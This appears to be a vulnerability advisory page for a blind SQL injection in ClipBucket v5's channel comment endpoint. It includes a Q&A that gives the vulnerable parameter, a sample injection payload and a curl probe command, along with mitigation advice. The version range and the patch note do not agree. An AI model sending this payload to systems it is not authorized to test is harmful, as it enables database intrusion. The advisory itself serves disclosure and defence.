CVE-2026-21875
Blind SQL Injection in ClipBucket v5 Channel Comment Function
Publication date: 2026-01-08
Last updated on: 2026-01-08
Assigner: GitHub, Inc.
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| clipbucket | clipbucket | to 5.5.2 (inc) |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-89 | The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2026-21875 is a critical blind SQL injection vulnerability in the ClipBucket v5 video sharing platform, specifically in the channel comments feature. It occurs because the obj_id parameter in a POST request to /actions/ajax.php is used directly in an SQL query without proper validation or sanitization. This allows an attacker to inject SQL code, such as '1' or 1=1-- -', to manipulate the database query. The vulnerability is blind boolean-based SQL injection, meaning attackers can infer database information without seeing direct output. It can be exploited remotely without authentication if anonymous comments are enabled, or with authentication if disabled. [1]
How can this vulnerability impact me? :
This vulnerability can have severe impacts including unauthorized extraction of sensitive database information, compromising the confidentiality, integrity, and availability of the system. Attackers can remotely exploit this vulnerability without any privileges if anonymous comments are enabled, potentially leading to full database compromise and data leakage. [1]
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by sending crafted POST requests to the /actions/ajax.php endpoint with the obj_id parameter containing SQL injection payloads such as "1' or 1=1-- -" and observing the application's behavior for signs of blind SQL injection. For example, using curl to send a test POST request: curl -X POST -d "obj_id=1' or 1=1-- -" https://your-clipbucket-site/actions/ajax.php If the response behavior differs from normal input, it may indicate vulnerability. Automated SQL injection testing tools can also be used to test this endpoint and parameter. [1]
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include: 1) Disable anonymous comments if enabled, as exploitation requires authentication otherwise. 2) Restrict access to the /actions/ajax.php endpoint to trusted users or networks. 3) Monitor and block suspicious POST requests containing SQL injection patterns targeting the obj_id parameter. 4) Apply any available patches or updates; note that the vulnerability was patched in ClipBucket v5.5.2 (#191). Until patching, these mitigations can reduce risk. [1]
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
This vulnerability allows attackers to perform blind SQL injection attacks that can lead to unauthorized access and extraction of sensitive database information. Such a compromise of sensitive data can result in violations of data protection regulations like GDPR and HIPAA, which require safeguarding personal and sensitive information against unauthorized access and breaches. Therefore, exploitation of this vulnerability could lead to non-compliance with these standards due to potential data breaches and loss of confidentiality, integrity, and availability of protected data. [1]